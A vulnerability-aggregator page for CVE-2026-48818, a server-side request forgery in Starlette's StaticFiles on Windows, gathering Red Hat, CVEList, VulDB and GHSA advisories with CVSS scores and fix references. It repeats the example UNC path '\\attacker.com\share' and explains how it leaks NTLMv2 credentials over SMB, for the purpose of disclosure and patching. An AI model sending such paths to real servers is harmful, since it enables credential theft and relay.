CVE-2026-48818
published 2026-06-17CVE-2026-48818: Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. An UNC path such as…
PriorityP348high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
0.37%
28.6th percentile
Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. An UNC path such as \\attacker.com\share can cause os.path.realpath to initiate an outbound SMB connection before the path is rejected, exposing the service account’s NTLMv2 credentials for offline cracking or relay even though the HTTP response is only a 404. The issue affects default follow_symlink=False deployments, including frameworks built on Starlette such as FastAPI; POSIX systems and follow_symlink=True are unaffected. The issue is fixed in 1.1.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| encode | starlette | < 1.1.0 | 1.1.0 |
| encode | starlette | >= 0 < 1.1.0 | 1.1.0 |
| kludex | starlette | < 1.1.0 | 1.1.0 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvelistv5v3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
vendor_redhat·2026-06-17·CVSS 7.5
CVE-2026-48818 [HIGH] CWE-918 starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. An UNC path such as \\attacker.com\share can cause os.path.realpath to initiate an outbound SMB connection before the path is rejected, exposing the service account’s NTLMv2 credentials for offline cracking or relay even though the HTTP response is only a 404. The issue affects default follow_symlink=False deployments, including frameworks built on Starlette such as FastAPI; POSIX systems and follow_symlink=True are unaffected. The issue is fixed in 1.1.0.
A flaw was found in Starlette, a lightweight ASGI framework. On Windows systems, the StaticFiles component is vulner
CVEList
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
cvelistv5·2026-06-17·CVSS 7.5
CVE-2026-48818 [HIGH] CWE-918 Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. An UNC path such as \\attacker.com\share can cause os.path.realpath to initiate an outbound SMB connection before the path is rejected, exposing the service account’s NTLMv2 credentials for offline cracking or relay even though the HTTP response is only a 404. The issue affects default follow_symlink=False deployments, including frameworks built on Starlette such as FastAPI; POSIX systems and follow_symlink=True are unaffected. The issue is fixed in 1.1.0.
VulDB
Kludex starlette up to 1.0.x on Windows SMB Connection server-side request forgery (EUVD-2026-37773)
vuldb·2026-06-17
CVE-2026-48818 [CRITICAL] Kludex starlette up to 1.0.x on Windows SMB Connection server-side request forgery (EUVD-2026-37773)
A vulnerability was found in Kludex starlette up to 1.0.x on Windows. It has been declared as critical. Affected by this issue is some unknown functionality of the component SMB Connection Handler. Such manipulation leads to server-side request forgery.
This vulnerability is listed as CVE-2026-48818. The attack may be performed from remote. There is no available exploit.
It is recommended to upgrade the affected component.
GHSA
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
ghsa·2026-06-15
CVE-2026-48818 [HIGH] CWE-918 Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
### Summary
When serving static files on Windows, `StaticFiles` resolves the requested path with [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.realpath). If a UNC path (such as `\\attacker.com\share`) reaches the resolver, `realpath` causes the process to open a connection to the remote host over SMB (port 445). This is a server-side request forgery (SSRF) that leaks the service account's NTLMv2 credentials to the attacker-controlled host, which can then be cracked offline or relayed to other hosts.
### Details
`StaticFiles.lookup_path()` joins the requested path onto the served directory and calls [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.re
No detection rules found.
No public exploits indexed.
https://github.com/Kludex/starlette/commit/fd53168a7767b6b55ba5af787fd88f49e33cabc5https://github.com/Kludex/starlette/pull/3287https://github.com/Kludex/starlette/releases/tag/1.1.0https://github.com/Kludex/starlette/security/advisories/GHSA-wqp7-x3pw-xc5rhttps://access.redhat.com/errata/RHSA-2026:30087https://access.redhat.com/errata/RHSA-2026:30088https://access.redhat.com/errata/RHSA-2026:30089https://access.redhat.com/security/cve/CVE-2026-48818https://bugzilla.redhat.com/show_bug.cgi?id=2490020https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48818.json
2026-06-17
Published